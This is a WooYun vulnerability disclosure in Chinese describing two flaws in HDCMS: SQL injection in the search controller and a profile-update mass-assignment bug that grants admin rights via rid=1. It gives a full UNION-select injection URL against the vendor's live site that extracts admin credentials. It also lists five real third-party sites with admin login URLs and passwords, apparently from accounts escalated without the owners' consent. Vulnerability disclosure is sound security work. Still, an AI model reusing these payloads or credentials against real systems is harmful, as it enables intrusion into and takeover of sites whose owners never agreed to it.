当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091764

漏洞标题:HDCMS内容管理系统两处sql注入(官网demo)

相关厂商:hdphp.com

漏洞作者: roker

提交时间:2015-01-28 10:41

修复时间:2015-04-02 10:23

公开时间:2015-04-02 10:23

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-28: 细节已通知厂商并且等待厂商处理中
2015-02-02: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-03-29: 细节向核心白帽子及相关领域专家公开
2015-04-08: 细节向普通白帽子公开
2015-04-18: 细节向实习白帽子公开
2015-04-02: 细节向公众公开

简要描述:

rt

详细说明:

HDCMS是一个用PHP编写的内容管理系统软件包,数据库采用Mysql。提供强大的、完整的功能,满足快速网站开发的目的。HDCMS完全基于后盾网HDPHP框架开发提供了众多的安全特性,产品安全无忧。这些特性包括:
COOKIE加密处理
数据预处理机制
XSS安全防护
防SQL注入
。。。。。。。。
#1
HDCMS/Addons/Search/Controller/IndexController.class.php

public function index()
{
if ($wd = Q('post.wd')) {
go(addon_url('index', array('wd' => $wd)));
}
$data = array();
if (!$search_history = cookie('search_history')) {
$search_history = array();
}
if ($wd = Q('get.wd')) {
$ContentModel = $this->db;
$where[] = "category.mid=" . $this->mid;
//按Tag搜索
if (Q('type') == 'tag') {
//当前Tag文章aid
if ($aids = K("ContentTag")->getContentAid($this->mid, $wd)) {
$where[] = $ContentModel->table . '.aid IN(' . implode(',', $aids) . ')';
}
} else {
//按文章标签搜索
$where[] = " title like '%$wd%'";
}
//搜索时间
if ($time = Q('get.time')) {
switch ($time) {
case 'day':
$where[] = 'addtime>' . (time() - 3600 * 24);
break;
case 'week':
$where[] = 'addtime>' . (time() - 3600 * 24 * 7);
break;
case 'month':
$where[] = 'addtime>' . (time() - 3600 * 24 * 7 * 30);
break;
case 'year':
$where[] = 'addtime>' . (time() - 3600 * 24 * 7 * 30 * 12);
break;
}
}
$page = new Page($ContentModel->where($where)->count(), 10);
$data = $ContentModel->where($where)->limit($page->limit())->order('arc_sort ASC,addtime DESC')->all();
array_unshift($search_history, $wd);
$search_history = array_unique($search_history);
$search_history = array_slice($search_history, 0, 8);
cookie('search_history', $search_history);
}
$this->assign('data', $data);
$this->assign('search_history', ($search_history));
$this->assign('model', S('model')); //模型
$this->assign('search_word', cookie('search_word'));
$this->display();
}
}


直接 Q('get.wd') 了,没有相应的过滤参数。导致注入的产生
以官网为例
http://www.hdphp.com/index.php?g=Addon&m=Search&c=Index&a=index&wd=a%%27%20and%201%20=%202%20union%20select%201,2,3,(select%20concat(username,0x5c,password)%20from%20hd_user%20where%20rid=1%20limit%201),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78%23

1.jpg


#2
HDCMS/Member/Controller/AccountController.class.php

public function personal()
{
if (IS_POST) {
if ($this->db->personal()) {
$this->success('修改资料成功');
} else {
$this->error($this->db->error);
}
} else {
$field = M('user')->find($_SESSION['user']['uid']);
$this->assign('field', $field);
$this->display();
}
}


跟到function personal

public function personal()
{
if (!Q('post.nickname')) {
$this->error = '昵称不能为空';
return false;
}
if (!$email = Q('post.email')) {
$this->error = '邮箱不能为空';
return false;
}
if (M('user')->where(array('email' => array("EQ", $email), 'username' => array('NEQ', $_SESSION['user']['username'])))->find()) {
$this->error = '昵称已经存在';
return false;
}
$_POST['uid'] = $_SESSION['user']['uid'];
return $this->save();
}


没有对键值进行合法判断,在hdcms中 管理员和会员是在同一个表的,区别就是rid的不同。
那么 我们修改资料 添加参数 rid=1 就能提升为管理组了,同样demo示例、

1.jpg


2.jpg


案例可参考官网给出的http://www.hdphp.com/index.php?m=Index&c=Category&a=index&cid=11。

漏洞证明:

2.jpg


1.jpg


案列。。

1.jpg


2.jpg


3.jpg


提升为管理员的案例
http://www.whgnlaser.net/index.php?m=Admin&c=Index&a=index 123456 123456
http://www.ten-chou.com/index.php?m=Admin&c=Index&a=index 111111 111111
http://www.wicte.com/index.php?m=Admin&c=Index&a=index 111111 111111
http://sjs56.com/index.php?m=Admin&c=Index&a=index 111111 111111
http://www.bj-hyd.com/index.php?m=Admin&c=Index&a=index 111111 111111

修复方案:

加强过滤

版权声明:转载请注明来源 roker@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-02 10:23

厂商回复:

最新状态:

暂无


漏洞评价:

评论